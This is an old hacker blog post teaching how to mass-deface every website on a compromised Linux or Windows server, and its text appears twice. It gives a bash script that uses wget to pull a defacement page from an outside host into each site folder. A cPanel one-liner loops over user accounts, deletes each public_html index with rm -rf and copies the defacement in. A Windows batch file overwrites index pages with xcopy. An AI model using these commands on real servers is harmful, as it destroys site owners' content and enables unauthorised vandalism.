Saturday 13 July 2013
SIMPLE WAY TO MASS ATTACK LINUX OR WINDOWS SERVERS
hi all
today we're going to make a simple script to help us with mass attack .
let's talk a first on linux server :
at first we must get the folders that we whant to mass attack them
example :
/home/3xp1r3/www/site1.com
/home/3xp1r3/www/site2.com
/home/3xp1r3/www/site3.com
then let's make a simple bash (.sh) file to put indexs in those page :
then go to terminal and execute : sh test.sh , and watch the magic
note that you can change wget & cd command with cp or mv and others .
command are in here in case that:
http://qfs.mobi/f565266
your permission is denied when using any of thease command
My secret style :
done
now move to windows servers
same as linux we must have folders dir . and here we make a file with extation bat ( .bat) :
note that my index is in the dir : c:/test/site.com/index.html
and now go to cmd shell and execute : start test.bat , and that's it .
hope you get it
Posted by: x3o-1337 :)
today we're going to make a simple script to help us with mass attack .
let's talk a first on linux server :
at first we must get the folders that we whant to mass attack them
example :
/home/3xp1r3/www/site1.com
/home/3xp1r3/www/site2.com
/home/3xp1r3/www/site3.com
then let's make a simple bash (.sh) file to put indexs in those page :
Code:
#!/bin/bash
cd /home/3xp1r3/www/site1.com && wget http://anysite.com/index.html -o index.html
cd /home/3xp1r3/www/site2.com && wget http://anysite.com/index.html -o index.html
cd /home/3xp1r3/www/site3.com && wget http://anysite.com/index.html -o index.html
echo " finish "
then go to terminal and execute : sh test.sh , and watch the magic
note that you can change wget & cd command with cp or mv and others .
command are in here in case that:
http://qfs.mobi/f565266
your permission is denied when using any of thease command
My secret style :
Code:
ls /var/cpanel/users`;do rm -rf /home/$i/public_html/index.* ; cp -rf index.html /home/$i/public_html/ ;
done
now move to windows servers
same as linux we must have folders dir . and here we make a file with extation bat ( .bat) :
Code:
@echo off
xcopy c:/test/site.com/index.html c:/test/site1.com/index.html
xcopy c:/test/site.com/index.html c:/test/site2.com/index.html
xcopy c:/test/site.com/index.html c:/test/site3.com/index.html
note that my index is in the dir : c:/test/site.com/index.html
and now go to cmd shell and execute : start test.bat , and that's it .
hope you get it
Posted by: x3o-1337 :)
0 comments:
Post a Comment